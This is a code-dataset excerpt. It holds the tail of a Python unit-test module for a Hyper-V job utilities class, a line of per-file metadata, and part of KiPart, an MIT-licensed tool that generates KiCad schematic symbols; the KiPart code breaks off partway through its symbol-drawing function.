                          self._FAKE_JOB_PATH)

    @ddt.data({"extended": False, "expected_fields": ["InstanceID"]},
              {"extended": True, "expected_fields": ["InstanceID",
                                                     "DetailedStatus"]})
    @ddt.unpack
    @mock.patch.object(jobutils.JobUtils, '_get_job_error_details')
    def test_get_job_details(self, mock_get_job_err, expected_fields,
                             extended):
        mock_job = mock.Mock()

        details = self.jobutils._get_job_details(mock_job, extended=extended)

        if extended:
            mock_get_job_err.assert_called_once_with(mock_job)
            self.assertEqual(details['RawErrors'],
                             mock_get_job_err.return_value)

        for field in expected_fields:
            self.assertEqual(getattr(mock_job, field), details[field])

    def test_get_job_error_details(self):
        mock_job = mock.Mock()
        error_details = self.jobutils._get_job_error_details(mock_job)
        mock_job.GetErrorEx.assert_called_once_with()
        self.assertEqual(mock_job.GetErrorEx.return_value, error_details)

    def test_get_job_error_details_exception(self):
        mock_job = mock.Mock()
        mock_job.GetErrorEx.side_effect = Exception
        self.assertIsNone(self.jobutils._get_job_error_details(mock_job))

    def test_get_pending_jobs(self):
        mock_killed_job = mock.Mock(JobState=constants.JOB_STATE_KILLED)
        mock_running_job = mock.Mock(JobState=constants.WMI_JOB_STATE_RUNNING)
        mock_error_st_job = mock.Mock(JobState=constants.JOB_STATE_EXCEPTION)

        mappings = [mock.Mock(AffectingElement=None),
                    mock.Mock(AffectingElement=mock_killed_job),
                    mock.Mock(AffectingElement=mock_running_job),
                    mock.Mock(AffectingElement=mock_error_st_job)]
        self.jobutils._conn.Msvm_AffectedJobElement.return_value = mappings

        mock_affected_element = mock.Mock()

        expected_pending_jobs = [mock_running_job]
        pending_jobs = self.jobutils._get_pending_jobs_affecting_element(
            mock_affected_element)
        self.assertEqual(expected_pending_jobs, pending_jobs)

        self.jobutils._conn.Msvm_AffectedJobElement.assert_called_once_with(
            AffectedElement=mock_affected_element.path_.return_value)

    @mock.patch.object(jobutils._utils, '_is_not_found_exc')
    def test_get_pending_jobs_ignored(self, mock_is_not_found_exc):
        mock_not_found_mapping = mock.MagicMock()
        type(mock_not_found_mapping).AffectingElement = mock.PropertyMock(
            side_effect=exceptions.x_wmi)
        self.jobutils._conn.Msvm_AffectedJobElement.return_value = [
            mock_not_found_mapping]

        pending_jobs = self.jobutils._get_pending_jobs_affecting_element(
            mock.MagicMock())
        self.assertEqual([], pending_jobs)

    @mock.patch.object(jobutils._utils, '_is_not_found_exc')
    def test_get_pending_jobs_reraised(self, mock_is_not_found_exc):
        mock_is_not_found_exc.return_value = False
        mock_not_found_mapping = mock.MagicMock()
        type(mock_not_found_mapping).AffectingElement = mock.PropertyMock(
            side_effect=exceptions.x_wmi)
        self.jobutils._conn.Msvm_AffectedJobElement.return_value = [
            mock_not_found_mapping]

        self.assertRaises(exceptions.x_wmi,
                          self.jobutils._get_pending_jobs_affecting_element,
                          mock.MagicMock())

    @ddt.data(True, False)
    @mock.patch.object(jobutils.JobUtils,
                       '_get_pending_jobs_affecting_element')
    def test_stop_jobs_helper(self, jobs_ended, mock_get_pending_jobs):
        mock_job1 = mock.Mock(Cancellable=True)
        mock_job2 = mock.Mock(Cancellable=True)
        mock_job3 = mock.Mock(Cancellable=False)

        pending_jobs = [mock_job1, mock_job2, mock_job3]
        mock_get_pending_jobs.side_effect = (
            pending_jobs,
            pending_jobs if not jobs_ended else [])

        mock_job1.RequestStateChange.side_effect = (
            test_base.FakeWMIExc(hresult=jobutils._utils._WBEM_E_NOT_FOUND))
        mock_job2.RequestStateChange.side_effect = (
            test_base.FakeWMIExc(hresult=mock.sentinel.hresult))

        if jobs_ended:
            self.jobutils._stop_jobs(mock.sentinel.vm)
        else:
            self.assertRaises(exceptions.JobTerminateFailed,
                              self.jobutils._stop_jobs,
                              mock.sentinel.vm)

        mock_get_pending_jobs.assert_has_calls(
            [mock.call(mock.sentinel.vm)] * 2)

        mock_job1.RequestStateChange.assert_called_once_with(
            self.jobutils._KILL_JOB_STATE_CHANGE_REQUEST)
        mock_job2.RequestStateChange.assert_called_once_with(
            self.jobutils._KILL_JOB_STATE_CHANGE_REQUEST)
        self.assertFalse(mock_job3.RequestStateChange.called)

    @mock.patch.object(jobutils.JobUtils, '_stop_jobs')
    def test_stop_jobs(self, mock_stop_jobs_helper):
        fake_timeout = 1
        self.jobutils.stop_jobs(mock.sentinel.element, fake_timeout)
        mock_stop_jobs_helper.assert_called_once_with(mock.sentinel.element)

    def test_is_job_completed_true(self):
        job = mock.MagicMock(JobState=constants.WMI_JOB_STATE_COMPLETED)
        self.assertTrue(self.jobutils._is_job_completed(job))

    def test_is_job_completed_false(self):
        job = mock.MagicMock(JobState=constants.WMI_JOB_STATE_RUNNING)
        self.assertFalse(self.jobutils._is_job_completed(job))

    def _prepare_wait_for_job(self, state=_FAKE_JOB_STATUS_BAD,
                              error_code=0):
        mock_job = mock.MagicMock()
        mock_job.JobState = state
        mock_job.ErrorCode = error_code
        mock_job.Description = self._FAKE_JOB_DESCRIPTION
        mock_job.ElapsedTime = self._FAKE_ELAPSED_TIME

        wmi_patcher = mock.patch.object(jobutils.JobUtils, '_get_wmi_obj')
        mock_wmi = wmi_patcher.start()
        self.addCleanup(wmi_patcher.stop)
        mock_wmi.return_value = mock_job

        return mock_job

    def test_modify_virt_resource(self):
        side_effect = [
            (self._FAKE_JOB_PATH, mock.MagicMock(), self._FAKE_RET_VAL)]
        self._check_modify_virt_resource_max_retries(side_effect=side_effect)

    def test_modify_virt_resource_max_retries_exception(self):
        side_effect = exceptions.HyperVException('expected failure.')
        self._check_modify_virt_resource_max_retries(
            side_effect=side_effect, num_calls=6, expected_fail=True)

    def test_modify_virt_resource_max_retries(self):
        side_effect = [exceptions.HyperVException('expected failure.')] * 5 + [
            (self._FAKE_JOB_PATH, mock.MagicMock(), self._FAKE_RET_VAL)]
        self._check_modify_virt_resource_max_retries(side_effect=side_effect,
                                                     num_calls=5)

    @mock.patch('time.sleep')
    def _check_modify_virt_resource_max_retries(
            self, mock_sleep, side_effect, num_calls=1, expected_fail=False):
        mock_svc = mock.MagicMock()
        self.jobutils._vs_man_svc_attr = mock_svc
        mock_svc.ModifyResourceSettings.side_effect = side_effect
        mock_res_setting_data = mock.MagicMock()
        mock_res_setting_data.GetText_.return_value = mock.sentinel.res_data

        if expected_fail:
            self.assertRaises(exceptions.HyperVException,
                              self.jobutils.modify_virt_resource,
                              mock_res_setting_data)
        else:
            self.jobutils.modify_virt_resource(mock_res_setting_data)

        mock_calls = [
            mock.call(ResourceSettings=[mock.sentinel.res_data])] * num_calls
        mock_svc.ModifyResourceSettings.has_calls(mock_calls)
        mock_sleep.has_calls(mock.call(1) * num_calls)

    def test_add_virt_resource(self):
        self._test_virt_method('AddResourceSettings', 3, 'add_virt_resource',
                               True, mock.sentinel.vm_path,
                               [mock.sentinel.res_data])

    def test_remove_virt_resource(self):
        self._test_virt_method('RemoveResourceSettings', 2,
                               'remove_virt_resource', False,
                               ResourceSettings=[mock.sentinel.res_path])

    def test_add_virt_feature(self):
        self._test_virt_method('AddFeatureSettings', 3, 'add_virt_feature',
                               True, mock.sentinel.vm_path,
                               [mock.sentinel.res_data])

    def test_modify_virt_feature(self):
        self._test_virt_method('ModifyFeatureSettings', 3,
                               'modify_virt_feature', False,
                               FeatureSettings=[mock.sentinel.res_data])

    def test_remove_virt_feature(self):
        self._test_virt_method('RemoveFeatureSettings', 2,
                               'remove_virt_feature', False,
                               FeatureSettings=[mock.sentinel.res_path])

    def _test_virt_method(self, vsms_method_name, return_count,
                          utils_method_name, with_mock_vm, *args, **kwargs):
        mock_svc = mock.MagicMock()
        self.jobutils._vs_man_svc_attr = mock_svc
        vsms_method = getattr(mock_svc, vsms_method_name)
        mock_rsd = self._mock_vsms_method(vsms_method, return_count)
        if with_mock_vm:
            mock_vm = mock.MagicMock()
            mock_vm.path_.return_value = mock.sentinel.vm_path
            getattr(self.jobutils, utils_method_name)(mock_rsd, mock_vm)
        else:
            getattr(self.jobutils, utils_method_name)(mock_rsd)

        if args:
            vsms_method.assert_called_once_with(*args)
        else:
            vsms_method.assert_called_once_with(**kwargs)

    def _mock_vsms_method(self, vsms_method, return_count):
        args = None
        if return_count == 3:
            args = (
                mock.sentinel.job_path, mock.MagicMock(), self._FAKE_RET_VAL)
        else:
            args = (mock.sentinel.job_path, self._FAKE_RET_VAL)

        vsms_method.return_value = args
        mock_res_setting_data = mock.MagicMock()
        mock_res_setting_data.GetText_.return_value = mock.sentinel.res_data
        mock_res_setting_data.path_.return_value = mock.sentinel.res_path

        self.jobutils.check_ret_val = mock.MagicMock()

        return mock_res_setting_data

    @mock.patch.object(jobutils.JobUtils, 'check_ret_val')
    def test_remove_multiple_virt_resources_not_found(self, mock_check_ret):
        excepinfo = [None] * 5 + [jobutils._utils._WBEM_E_NOT_FOUND]
        mock_check_ret.side_effect = exceptions.x_wmi(
            'expected error', com_error=mock.Mock(excepinfo=excepinfo))
        vsms_method = self.jobutils._vs_man_svc.RemoveResourceSettings
        vsms_method.return_value = (mock.sentinel.job, mock.sentinel.ret_val)
        mock_virt_res = mock.Mock()

        self.assertRaises(exceptions.NotFound,
                          self.jobutils.remove_virt_resource, mock_virt_res)

        vsms_method.assert_called_once_with(
            ResourceSettings=[mock_virt_res.path_.return_value])
        mock_check_ret.assert_called_once_with(mock.sentinel.ret_val,
                                               mock.sentinel.job)
apache-2.0
-1,470,856,766,625,067,300
42.024024
79
0.619879
false
3.602464
true
false
false
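The @ddt.data/@ddt.unpack decorators used throughout the test case above generate one test method per data entry; the pattern in miniature (standalone sketch, requires the ddt package):

import unittest
import ddt

@ddt.ddt
class ExampleTestCase(unittest.TestCase):
    @ddt.data({"doubled": False, "expected": 1},
              {"doubled": True, "expected": 2})
    @ddt.unpack
    def test_variants(self, doubled, expected):
        # each dict above becomes its own generated test method
        self.assertEqual(2 if doubled else 1, expected)

if __name__ == '__main__':
    unittest.main()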
xesscorp/KiPart
kipart/kipart.py
1
39760
# -*- coding: utf-8 -*- # MIT license # # Copyright (C) 2015-2019 by XESS Corp. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. from __future__ import absolute_import, division, print_function import argparse as ap import importlib import io import math import os import re import sys import zipfile from builtins import str from collections import OrderedDict from copy import copy from pprint import pprint from affine import Affine from past.utils import old_div from .common import * from .pckg_info import __version__ from .py_2_3 import * __all__ = ["kipart"] # Only export this routine for use by the outside world. THIS_MODULE = sys.modules[__name__] # Ref to this module for making named calls. # Settings for creating the KiCad schematic part symbol. # Dimensions are given in mils (0.001"). # Origin point. XO = 0 YO = 0 # Pin settings. PIN_LENGTH = 200 PIN_SPACING = 100 PIN_NUM_SIZE = 50 # Font size for pin numbers. PIN_NAME_SIZE = 50 # Font size for pin names. PIN_NAME_OFFSET = 40 # Separation between pin and pin name. PIN_ORIENTATION = "left" PIN_STYLE = "line" SHOW_PIN_NUMBER = True # Show pin numbers when True. SHOW_PIN_NAME = True # Show pin names when True. SINGLE_PIN_SUFFIX = "" MULTI_PIN_SUFFIX = "*" PIN_SPACER_PREFIX = "*" # Settings for box drawn around pins in a unit. DEFAULT_BOX_LINE_WIDTH = 0 # Mapping from understandable schematic symbol box fill-type name # to the fill-type indicator used in the KiCad part library. BOX_FILLS = {"no_fill": "N", "fg_fill": "F", "bg_fill": "f"} DEFAULT_BOX_FILL = "bg_fill" # Part reference. REF_SIZE = 60 # Font size. REF_Y_OFFSET = 250 # Part number. PART_NUM_SIZE = 60 # Font size. PART_NUM_Y_OFFSET = 150 # Part footprint PART_FOOTPRINT_SIZE = 60 # Font size. PART_FOOTPRINT_Y_OFFSET = 50 # Part manufacturer number. PART_MPN_SIZE = 60 # Font size. PART_MPN_Y_OFFSET = -50 # Part datasheet. PART_DATASHEET_SIZE = 60 # Font size. PART_DATASHEET_Y_OFFSET = -150 # Part description. PART_DESC_SIZE = 60 # Font size. PART_DESC_Y_OFFSET = -250 # Mapping from understandable pin orientation name to the orientation # indicator used in the KiCad part library. This mapping looks backward, # but if pins are placed on the left side of the symbol, you actually # want to use the pin symbol where the line points to the right. # The same goes for the other sides. 
PIN_ORIENTATIONS = { "": "R", "left": "R", "right": "L", "bottom": "U", "down": "U", "top": "D", "up": "D", } scrubber = re.compile("[^\w~#]+") PIN_ORIENTATIONS = { scrubber.sub("", k).lower(): v for k, v in list(PIN_ORIENTATIONS.items()) } ROTATION = {"left": 0, "right": 180, "bottom": 90, "top": -90} # Mapping from understandable pin type name to the type # indicator used in the KiCad part library. PIN_TYPES = { "input": "I", "inp": "I", "in": "I", "clk": "I", "output": "O", "outp": "O", "out": "O", "bidirectional": "B", "bidir": "B", "bi": "B", "inout": "B", "io": "B", "iop": "B", "tristate": "T", "tri": "T", "passive": "P", "pass": "P", "unspecified": "U", "un": "U", "": "U", "analog": "U", "power_in": "W", "pwr_in": "W", "pwrin": "W", "power": "W", "pwr": "W", "ground": "W", "gnd": "W", "power_out": "w", "pwr_out": "w", "pwrout": "w", "pwr_o": "w", "open_collector": "C", "opencollector": "C", "open_coll": "C", "opencoll": "C", "oc": "C", "open_emitter": "E", "openemitter": "E", "open_emit": "E", "openemit": "E", "oe": "E", "no_connect": "N", "noconnect": "N", "no_conn": "N", "noconn": "N", "nc": "N", } PIN_TYPES = {scrubber.sub("", k).lower(): v for k, v in list(PIN_TYPES.items())} # Mapping from understandable pin drawing style to the style # indicator used in the KiCad part library. PIN_STYLES = { "line": "", "": "", "inverted": "I", "inv": "I", "~": "I", "#": "I", "clock": "C", "clk": "C", "rising_clk": "C", "inverted_clock": "IC", "inv_clk": "IC", "clk_b": "IC", "clk_n": "IC", "~clk": "IC", "#clk": "IC", "input_low": "L", "inp_low": "L", "in_lw": "L", "in_b": "L", "in_n": "L", "~in": "L", "#in": "L", "clock_low": "CL", "clk_low": "CL", "clk_lw": "CL", "output_low": "V", "outp_low": "V", "out_lw": "V", "out_b": "V", "out_n": "V", "~out": "V", "#out": "V", "falling_edge_clock": "F", "falling_clk": "F", "fall_clk": "F", "non_logic": "X", "nl": "X", "analog": "X", } PIN_STYLES = {scrubber.sub("", k).lower(): v for k, v in list(PIN_STYLES.items())} # Format strings for various items in a KiCad part library. LIB_HEADER = "EESchema-LIBRARY Version 2.3\n" START_DEF = "DEF {name} {ref} 0 {pin_name_offset} {show_pin_number} {show_pin_name} {num_units} L N\n" END_DEF = "ENDDEF\n" REF_FIELD = 'F0 "{ref_prefix}" {x} {y} {font_size} H V {text_justification} CNN\n' PARTNUM_FIELD = 'F1 "{num}" {x} {y} {font_size} H V {text_justification} CNN\n' FOOTPRINT_FIELD = 'F2 "{footprint}" {x} {y} {font_size} H I {text_justification} CNN\n' DATASHEET_FIELD = 'F3 "{datasheet}" {x} {y} {font_size} H I {text_justification} CNN\n' MPN_FIELD = 'F4 "{manf_num}" {x} {y} {font_size} H I {text_justification} CNN "manf#"\n' DESC_FIELD = 'F5 "{desc}" {x} {y} {font_size} H I {text_justification} CNN "desc"\n' START_DRAW = "DRAW\n" END_DRAW = "ENDDRAW\n" BOX = "S {x0} {y0} {x1} {y1} {unit_num} 1 {line_width} {fill}\n" PIN = "X {name} {num} {x} {y} {length} {orientation} {num_sz} {name_sz} {unit_num} 1 {pin_type} {pin_style}\n" def annotate_pins(unit_pins): """Annotate pin names to indicate special information.""" for name, pins in unit_pins: # If there are multiple pins with the same name in a unit, then append a # distinctive suffix to the pin name to indicate multiple pins are placed # at a single location on the unit. (This is done so multiple pins that # should be on the same net (e.g. GND) can be connected using a single # net connection in the schematic.) 
        name_suffix = SINGLE_PIN_SUFFIX
        if len(pins) > 1:
            # name_suffix = MULTI_PIN_SUFFIX
            name_suffix = "[{}]".format(len(pins))
        for pin in pins:
            pin.name += name_suffix


def get_pin_num_and_spacer(pin):
    pin_num = str(pin.num)
    pin_spacer = 0
    # Spacer pins have pin numbers starting with a special prefix char.
    if pin_num.startswith(PIN_SPACER_PREFIX):
        pin_spacer = 1
        pin_num = pin_num[1:]  # Remove the spacer prefix.
    return pin_num, pin_spacer


def count_pin_slots(unit_pins):
    """Count the number of vertical pin slots needed for a column of pins."""

    # Compute the # of slots for the column of pins, taking spacers into account.
    num_slots = 0
    pin_num_len = 0
    for name, pins in unit_pins:
        pin_spacer = 0
        pin_num_len = 0
        for pin in pins:
            pin_num, pin_spacer = get_pin_num_and_spacer(pin)
            pin_num_len = max(pin_num_len, len(pin_num))
        num_slots += pin_spacer  # Add a slot if there was a spacer.
        # Add a slot if the pin number was more than just a spacer prefix.
        if pin_num_len > 0:
            num_slots += 1
    return num_slots


def pins_bbox(unit_pins):
    """Return the bounding box of a column of pins and their names."""

    if len(unit_pins) == 0:
        return [[XO, YO], [XO, YO]]  # No pins, so no bounding box.

    width = 0
    for name, pins in unit_pins:
        # Update the maximum observed width of a pin name. This is used later to
        # size the width of the box surrounding the pin names for this unit.
        width = max(width, len(pins[0].name) * PIN_NAME_SIZE)

    # Add the separation space before and after the pin name.
    width += PIN_LENGTH + 2 * PIN_NAME_OFFSET
    # Make bounding box an integer number of pin spaces so pin connections are always on the grid.
    width = math.ceil(old_div(float(width), PIN_SPACING)) * PIN_SPACING

    # Compute the height of the column of pins.
    height = count_pin_slots(unit_pins) * PIN_SPACING

    return [[XO, YO + PIN_SPACING], [XO + width, YO - height]]


def balance_bboxes(bboxes):
    """Make the symbol more balanced by adjusting the bounding boxes of the pins on each side."""

    X = 0
    Y = 1

    def find_bbox_bbox(*bboxes):
        """Find the bounding box for a set of bounding boxes."""
        bb = [[0, 0], [0, 0]]
        for bbox in bboxes:
            bb[0][X] = min(bb[0][X], bbox[0][X])
            bb[1][X] = max(bb[1][X], bbox[1][X])
            bb[0][Y] = max(bb[0][Y], bbox[0][Y])
            bb[1][Y] = min(bb[1][Y], bbox[1][Y])
        return bb

    # Determine the number of sides of the symbol with pins.
    num_sides = len(bboxes)
    if num_sides == 4:
        # If the symbol has pins on all four sides, then check to see if there
        # are approximately the same number of pins on all four sides. If so,
        # then equalize the bounding box for each side. Otherwise, equalize
        # the left & right bounding boxes and the top & bottom bounding boxes.
        lr_bbox = find_bbox_bbox(bboxes["left"], bboxes["right"])
        lr_hgt = abs(lr_bbox[0][Y] - lr_bbox[1][Y])
        tb_bbox = find_bbox_bbox(bboxes["top"], bboxes["bottom"])
        tb_hgt = abs(tb_bbox[0][Y] - tb_bbox[1][Y])
        if 0.75 <= float(lr_hgt) / float(tb_hgt) <= 1 / 0.75:
            bal_bbox = find_bbox_bbox(*list(bboxes.values()))
            for side in bboxes:
                bboxes[side] = copy(bal_bbox)
        else:
            bboxes["left"] = copy(lr_bbox)
            bboxes["right"] = copy(lr_bbox)
            bboxes["top"] = copy(tb_bbox)
            bboxes["bottom"] = copy(tb_bbox)
    elif num_sides == 3:
        # If the symbol only has pins on three sides, then equalize the
        # bounding boxes for the pins on opposite sides and leave the
        # bounding box on the other side unchanged.
        if "left" not in bboxes or "right" not in bboxes:
            # Top & bottom side pins, but the left or right side is empty.
bal_bbox = find_bbox_bbox(bboxes["top"], bboxes["bottom"]) bboxes["top"] = copy(bal_bbox) bboxes["bottom"] = copy(bal_bbox) elif "top" not in bboxes or "bottom" not in bboxes: # Left & right side pins, but the top or bottom side is empty. bal_bbox = find_bbox_bbox(bboxes["left"], bboxes["right"]) bboxes["left"] = copy(bal_bbox) bboxes["right"] = copy(bal_bbox) elif num_sides == 2: # If the symbol only has pins on two opposing sides, then equalize the # height of the bounding boxes for each side. Leave the width unchanged. if "left" in bboxes and "right" in bboxes: bal_bbox = find_bbox_bbox(bboxes["left"], bboxes["right"]) bboxes["left"][0][Y] = bal_bbox[0][Y] bboxes["left"][1][Y] = bal_bbox[1][Y] bboxes["right"][0][Y] = bal_bbox[0][Y] bboxes["right"][1][Y] = bal_bbox[1][Y] elif "top" in bboxes and "bottom" in bboxes: bal_bbox = find_bbox_bbox(bboxes["top"], bboxes["bottom"]) bboxes["top"][0][Y] = bal_bbox[0][Y] bboxes["top"][1][Y] = bal_bbox[1][Y] bboxes["bottom"][0][Y] = bal_bbox[0][Y] bboxes["bottom"][1][Y] = bal_bbox[1][Y] def draw_pins(unit_num, unit_pins, bbox, transform, side, push, fuzzy_match): """Draw a column of pins rotated/translated by the transform matrix.""" # String to add pin definitions to. pin_defn = "" # Find the actual height of the column of pins and subtract it from the # bounding box (which should be at least as large). Half the difference # will be the offset needed to center the pins on the side of the symbol. Y = 1 # Index for Y coordinate. pins_bb = pins_bbox(unit_pins) height_offset = abs(bbox[0][Y] - bbox[1][Y]) - abs(pins_bb[0][Y] - pins_bb[1][Y]) push = min(max(0.0, push), 1.0) if side in ("right", "top"): push = 1.0 - push height_offset *= push height_offset -= height_offset % PIN_SPACING # Keep stuff on the PIN_SPACING grid. # Start drawing pins from the origin. x = XO y = YO - height_offset for name, pins in unit_pins: # Detect pins with "spacer" pin numbers. pin_spacer = 0 pin_num_len = 0 for pin in pins: pin_num, pin_spacer = get_pin_num_and_spacer(pin) pin_num_len = max(pin_num_len, len(pin_num)) y -= pin_spacer * PIN_SPACING # Add space between pins if there was a spacer. if pin_num_len == 0: continue # Omit pin if it only had a spacer prefix and no actual pin number. # Rotate/translate the current drawing point. (draw_x, draw_y) = transform * (x, y) # Use approximate matching to determine the pin's type, style and orientation. pin_type = find_closest_match(pins[0].type, PIN_TYPES, fuzzy_match) pin_style = find_closest_match(pins[0].style, PIN_STYLES, fuzzy_match) pin_side = find_closest_match(pins[0].side, PIN_ORIENTATIONS, fuzzy_match) if pins[0].hidden.lower().strip() in ["y", "yes", "t", "true", "1"]: pin_style = "N" + pin_style # Create all the pins with a particular name. If there are more than one, # they are laid on top of each other and only the first is visible. num_size = PIN_NUM_SIZE # First pin will be visible. for pin in pins: pin_num = str(pin.num) # Remove any spacer prefix on the pin numbers. if pin_num.startswith(PIN_SPACER_PREFIX): pin_num = pin_num[1:] # Create a pin using the pin data. pin_defn += PIN.format( name=pin.name, num=pin_num, x=int(draw_x), y=int(draw_y), length=PIN_LENGTH, orientation=pin_side, num_sz=num_size, name_sz=PIN_NAME_SIZE, unit_num=unit_num, pin_type=pin_type, pin_style=pin_style, ) # Turn off visibility after the first pin. num_size = 0 # Move to the next pin placement location on this unit. y -= PIN_SPACING return pin_defn # Return part symbol definition with pins added. 
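# ---------------------------------------------------------------------------
# Editor's note -- an illustrative sketch, not part of the original KiPart
# code. draw_pins() above applies a `transform` that draw_symbol() below
# builds by composing an `affine` rotation with a translation. The
# composition applies right-to-left: `Affine.translation(...) *
# Affine.rotation(...)` rotates a point first, then shifts it. A quick check
# with hypothetical coordinates:
#
#     >>> from affine import Affine
#     >>> t = Affine.translation(300, 0) * Affine.rotation(180)
#     >>> t * (100, 50)  # rotated 180 deg about the origin, then shifted +300 in x
#     (200.0, -50.0)
#
# This ordering is why draw_symbol() rotates the anchor point first
# (rot_anchor_pt) and only then derives the translation offsets.
# ---------------------------------------------------------------------------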
def zero_pad_nums(s):
    # Pad all numbers in the string with leading 0's.
    # Thus, 'A10' and 'A2' will become 'A00010' and 'A00002' and A2 will
    # appear before A10 in a list.
    try:
        return re.sub(
            r"\d+", lambda mtch: "0" * (8 - len(mtch.group(0))) + mtch.group(0), s
        )
    except TypeError:
        return s  # The input is probably not a string, so just return it unchanged.


def num_key(pin):
    """Generate a key from a pin's number so they are sorted by position on the package."""

    # Pad all numeric strings in the pin number with leading 0's.
    # Thus, 'A10' and 'A2' will become 'A00010' and 'A00002' and A2 will
    # appear before A10 in a list.
    return zero_pad_nums(pin[1][0].num)


def name_key(pin):
    """Generate a key from a pin's name so they are sorted more logically."""

    # Pad all numeric strings in the pin name with leading 0's.
    # Thus, 'adc10' and 'adc2' will become 'adc00010' and 'adc00002' and adc2 will
    # appear before adc10 in a list.
    return zero_pad_nums(pin[1][0].name)


def row_key(pin):
    """Generate a key from the order the pins were entered into the CSV file."""
    return pin[1][0].index


def draw_symbol(
    part_num,
    part_ref_prefix,
    part_footprint,
    part_manf_num,
    part_datasheet,
    part_desc,
    pin_data,
    sort_type,
    reverse,
    fuzzy_match,
    fill,
    box_line_width,
    push,
):
    """Add a symbol for a part to the library."""

    # Start the part definition with the header.
    part_defn = START_DEF.format(
        name=part_num,
        ref=part_ref_prefix,
        pin_name_offset=PIN_NAME_OFFSET,
        show_pin_number=SHOW_PIN_NUMBER and "Y" or "N",
        show_pin_name=SHOW_PIN_NAME and "Y" or "N",
        num_units=len(pin_data),
    )

    # Determine if there are pins across the top of the symbol.
    # If so, right-justify the reference, part number, etc. so they don't
    # run into the top pins. If not, stick with left-justification.
    text_justification = "L"
    horiz_offset = PIN_LENGTH
    for unit in list(pin_data.values()):
        if "top" in list(unit.keys()):
            text_justification = "R"
            horiz_offset = PIN_LENGTH - 50
            break

    # Create the field that stores the part reference.
    if not part_ref_prefix:
        part_ref_prefix = "U"
    part_defn += REF_FIELD.format(
        ref_prefix=part_ref_prefix,
        x=XO + horiz_offset,
        y=YO + REF_Y_OFFSET,
        text_justification=text_justification,
        font_size=REF_SIZE,
    )

    # Create the field that stores the part number.
    if not part_num:
        part_num = ""
    part_defn += PARTNUM_FIELD.format(
        num=part_num,
        x=XO + horiz_offset,
        y=YO + PART_NUM_Y_OFFSET,
        text_justification=text_justification,
        font_size=PART_NUM_SIZE,
    )

    # Create the field that stores the part footprint.
    if not part_footprint:
        part_footprint = ""
    part_defn += FOOTPRINT_FIELD.format(
        footprint=part_footprint,
        x=XO + horiz_offset,
        y=YO + PART_FOOTPRINT_Y_OFFSET,
        text_justification=text_justification,
        font_size=PART_FOOTPRINT_SIZE,
    )

    # Create the field that stores the datasheet link.
    if not part_datasheet:
        part_datasheet = ""
    part_defn += DATASHEET_FIELD.format(
        datasheet=part_datasheet,
        x=XO + horiz_offset,
        y=YO + PART_DATASHEET_Y_OFFSET,
        text_justification=text_justification,
        font_size=PART_DATASHEET_SIZE,
    )

    # Create the field that stores the manufacturer part number.
    if part_manf_num:
        part_defn += MPN_FIELD.format(
            manf_num=part_manf_num,
            x=XO + horiz_offset,
            y=YO + PART_MPN_Y_OFFSET,
            text_justification=text_justification,
            font_size=PART_MPN_SIZE,
        )

    # Create the field that stores the part description.
    if part_desc:
        part_defn += DESC_FIELD.format(
            desc=part_desc,
            x=XO + horiz_offset,
            y=YO + PART_DESC_Y_OFFSET,
            text_justification=text_justification,
            font_size=PART_DESC_SIZE,
        )

    # Start the section of the part definition that holds the part's units.
part_defn += START_DRAW # Get a reference to the sort-key generation function for pins. pin_key_func = getattr(THIS_MODULE, "{}_key".format(sort_type)) # This is the sort-key generation function for unit names. unit_key_func = lambda x: zero_pad_nums(x[0]) # Now create the units that make up the part. Unit numbers go from 1 # up to the number of units in the part. The units are sorted by their # names before assigning unit numbers. for unit_num, unit in enumerate( [p[1] for p in sorted(pin_data.items(), key=unit_key_func)], 1 ): # The indices of the X and Y coordinates in a list of point coords. X = 0 Y = 1 # Initialize data structures that store info for each side of a schematic symbol unit. all_sides = ["left", "right", "top", "bottom"] bbox = {side: [(XO, YO), (XO, YO)] for side in all_sides} box_pt = {side: [XO + PIN_LENGTH, YO + PIN_SPACING] for side in all_sides} anchor_pt = {side: [XO + PIN_LENGTH, YO + PIN_SPACING] for side in all_sides} transform = {} # Annotate the pins for each side of the symbol. for side_pins in list(unit.values()): annotate_pins(list(side_pins.items())) # Determine the actual bounding box for each side. bbox = {} for side, side_pins in list(unit.items()): bbox[side] = pins_bbox(list(side_pins.items())) # Adjust the sizes of the bboxes to make the unit look more symmetrical. balance_bboxes(bbox) # Determine some important points for each side of pins. for side in unit: # # C B-------A # | | # ------| name1 | # | | # ------| name2 | # # A = anchor point = upper-right corner of bounding box. # B = box point = upper-left corner of bounding box + pin length. # C = upper-left corner of bounding box. anchor_pt[side] = [ max(bbox[side][0][X], bbox[side][1][X]), max(bbox[side][0][Y], bbox[side][1][Y]), ] box_pt[side] = [ min(bbox[side][0][X], bbox[side][1][X]) + PIN_LENGTH, max(bbox[side][0][Y], bbox[side][1][Y]), ] # AL = left-side anchor point. # AB = bottom-side anchor point. # AR = right-side anchor point. # AT = top-side anchor-point. # +-------------+ # | | # | TOP | # | | # +------AL------------AT # | | # | | +---------+ # | | | | # | L | | | # | E | | R | # | F | | I | # | T | | G | # | | | H | # | | | T | # | | | | # +------AB-------+ AR--------+ # | BOTTOM | # +--------+ # # Create zero-sized bounding boxes for any sides of the unit without pins. # This makes it simpler to do the width/height calculation that follows. for side in all_sides: if side not in bbox: bbox[side] = [(XO, YO), (XO, YO)] # This is the width and height of the box in the middle of the pins on each side. box_width = max( abs(bbox["top"][0][Y] - bbox["top"][1][Y]), abs(bbox["bottom"][0][Y] - bbox["bottom"][1][Y]), ) box_height = max( abs(bbox["left"][0][Y] - bbox["left"][1][Y]), abs(bbox["right"][0][Y] - bbox["right"][1][Y]), ) for side in all_sides: # Each side of pins starts off with the orientation of a left-hand side of pins. # Transformation matrix starts by 